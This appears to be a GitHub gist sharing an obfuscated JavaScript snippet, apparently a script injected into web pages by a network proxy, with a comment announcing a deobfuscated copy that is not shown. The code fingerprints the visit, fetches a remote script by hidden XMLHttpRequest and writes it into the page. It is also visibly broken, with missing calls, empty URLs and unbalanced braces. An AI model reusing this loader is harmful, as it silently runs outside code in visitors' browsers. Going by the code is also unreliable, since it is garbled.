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Created September 7, 2015 23:36
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11 == t || C && 6 == t || (e.src = "" + o + "-148/60cc0b86-ca19-46a7-a583-8d0313a6999a_10.144.164.16/" + t + "." + (f + u));
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function o(o) {
return C ? "" : 1 == o && ""
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n = "fp",
s = n + i,
l = "158f29b47d38bec034f5206de4356f6342c752e9",
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o = o.toLowerCase();
if ("true" == o) return !0;
if ("false" == o) return !1;
o = l(o, t);
null !== o && (o = !!o);
return o
l = function(o, t) {
if (null === r(o, t)) return null;
o = parseInt(o);
return isNaN(o) ? null : o
a = function(o, t) {
if (null === r(o, t)) return null;
o = parseFloat(o);
return isNaN(o) ? null : o
_ = function(o, t) {
return null === r(o, t) ? null : o.split(",")
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e[u] = f.json;
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} catch (C) {}
function i(o) {
var t, e, r = [function() {
return new XMLHttpRequest
}, function() {
return new ActiveXObject("Msxml2.XMLHTTP")
}, function() {
return new ActiveXObject("Microsoft.XMLHTTP")
}, B.createRequest];
for (e = 0; r.length > e; e++) {
t = 0;
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t = r[e]();
} catch (i) {
t = 0
if (t) try {"GET", o, !1);
t.setRequestHeader("X-PLCS", "xhr");
if (200 == t.status) return t.responseText || " "
} catch (i) {}
function n(o, t) {
var e, r = T.createElement(o);
t && r.appendChild(T.createTextNode(t));
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function s(o) {
return o.replace("$PAGEURL$", escape(b.href))
function l() {
B.V = l.V;
l.oncomplete && l.oncomplete()
try {
var a, _, d, c, p, f, h, m = "text/javascript",
u = Math.random(),
g = (new Date).getTime(),
C = parseInt("nubyrq", 36),
w = parseFloat("15"),
B = window,
T = document,
b = B.location || T.location || {};
d = "http://" + unescape("");
p = T.createElement("div");
f = 3;
p.innerHTML = "<!--[if IE]><i></i><![endif]-->";
h = p.getElementsByTagName("i").length;
l.V = B.V;
B.V = l;
isNaN(w) && (w = 15);
c = g + 1e3 * w - 2;
C = isFinite(C) ? 1e3 * C : 0;
d += (~d.indexOf("?") ? ~d.indexOf(";") ? ";" : "&" : "?") + "_fp" + (0 | 1e3 * u) + "=" + u;
p = T.getElementsByTagName("script");
p = ((a = p.length) ? p[a - 1] : f = 4).parentNode || T.body || T.documentElement.firstChild;
if (d.split("/")[2] == {
_ = i(d);
if (_) {
f = 1;
l.js = _;
l.oncomplete = r;
if (T.readyState == (h ? "interactive" : "loading")) {
f = 2;
T.write("<scr".concat('ipt src="') + d + '" type="' + m + '"></scr'.concat("ipt>"))
} else p.appendChild(n("script", 0, "src", d, "type", m, "async", !1));
} catch (j) {}
if (window.V) {
if (V.js) try {
} catch (e) {}
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victorb commented Sep 9, 2015

The same code, with better variable names:

Thanks to

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